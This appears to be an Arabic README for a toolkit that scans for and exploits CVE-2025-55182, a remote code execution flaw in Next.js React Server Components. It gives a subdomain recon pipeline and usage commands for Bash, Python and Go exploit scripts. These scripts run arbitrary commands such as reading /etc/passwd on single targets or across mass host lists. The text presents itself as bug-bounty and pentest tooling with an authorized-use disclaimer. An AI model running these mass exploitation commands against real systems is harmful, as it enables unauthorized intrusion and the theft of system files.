
ماسح RCE عالي الدقة لثغرة CVE-2025-55182 التي تؤثر على Next.js RSC. يدعم الفحص الجماعي وتنفيذ الأوامر وخطوط الاستطلاع الآلية. مصمم لاختباري الاختراق والباحثين وصيادي المكافآت.
مجموعة أدوات شاملة لاكتشاف واستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في تطبيقات Next.js التي تستخدم React Server Components.
تتضمن هذه المستودعات ماسح Bash موحّد (وضع الهدف الفردي والوضع الجماعي)، وتنفيذات بلغة Python/Go، وسير عمل استطلاع لبرامج مكافآت الثغرات.

للبحث الجماعي في النطاقات الفرعية، استخدم هذا الخط الأنبوبي لتصفية الأهداف قبل المسح:
# 1. تعداد النطاقات الفرعية
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. تصفية المضيفات النشطة
httpx -l subs.txt -o live.txt
# 3. اكتشاف مسبق باستخدام Nuclei (اختياري)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
يدعم سكربت scanner.sh المسح على هدف فردي والمسح الجماعي من قائمة ملفات.
chmod +x scanner.sh
الأفضل للتحقق من هدف محدد مع مخرجات تفصيلية.
# فحص أساسي (الافتراضي هو "id")
./scanner.sh -d example.com
# تنفيذ أمر مخصص
./scanner.sh -d https://target.com -c "cat /etc/passwd"
يمسح قائمة من الروابط بكفاءة ويحفظ المضيفات المصابة في ملف.
# مسح قائمة من الروابط
./scanner.sh -l live.txt -c "whoami"
# ملف مخرجات مخصص
./scanner.sh -l live.txt -o my_bounty.txt
استخدمها إذا واجهت مشاكل في تهريب الأحرف الخاصة مع Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
أداء عالٍ، وتبعيات قليلة.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
هذه الأداة لأغراض تعليمية ولاختبارات الأمان المصرّح بها فقط. الاستخدام غير المصرّح به غير قانوني تمامًا. المطور لا يتحمل أي مسؤولية عن إساءة الاستخدام أو الأضرار الناتجة عن هذا البرنامج.
تفاصيل CVE من NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
نشرة React الأمنية (ثغرة React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
قالب Nuclei من ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Description |
|---|
-d, --domain | رابط الهدف الفردي |
-l, --list | ملف يحتوي على قائمة الروابط |
-c, --command | الأمر المراد تنفيذه (الافتراضي: id) |
-o, --output | ملف المخرجات للمضيفات المصابة (الافتراضي: vulnerable_hosts.txt) |